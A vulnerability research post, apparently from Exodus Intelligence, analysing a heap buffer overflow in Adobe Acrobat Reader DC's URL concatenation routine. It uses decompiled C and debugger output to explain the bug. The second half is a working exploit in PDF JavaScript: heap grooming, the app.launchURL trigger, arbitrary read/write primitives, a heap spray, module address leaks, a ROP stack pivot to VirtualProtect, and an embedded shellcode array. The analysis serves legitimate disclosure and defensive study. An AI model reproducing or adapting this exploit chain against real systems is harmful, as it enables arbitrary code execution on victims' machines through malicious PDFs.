All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax


  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
    if ( *lpString )
      v6 = lpString[1];
      if ( v6 )


        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
          v7 = lpString;
          while ( 1 )
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
            if ( !v9 || !v7 )
              goto LABEL_14;
          if ( !v9 )
            goto LABEL_15;


          *a5 = -2;
          return 0;
  if ( !Source || !lpString || !String || !a4 )
    *a5 = -2;
    goto LABEL_79;


  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
    *a5 = -7;
    return 0;


  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;


  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
    *a5 = -7;
    v5 = 0;
    goto LABEL_80;


  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;


  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
    *a5 = v13;
    goto LABEL_79;



  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
    if ( v35 )


      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
          *(_BYTE *)v23 = 0;
    if ( v47 )


      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141


099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161


0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"


0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);


  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )


    sub_2581894C(Destination, Source);
    result = 1;


    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  return result;

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);


  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )


    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      while ( v6 );
    while ( v7 );


    lstrcatA(lpString1, lpString2);
  return lpString1;

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.


We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution.Β 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit.Β Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {


    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);


    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;


    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();


    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;

    return arrayBuffers;

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {


    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);


    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];


    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    return rw;

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    return dataView.getUint32(addrOffset, true);

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    dataView.setUint32(addrOffset, data, true);

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;


    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allowΒ  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.


function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,


    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);


    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);


function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.


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The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.
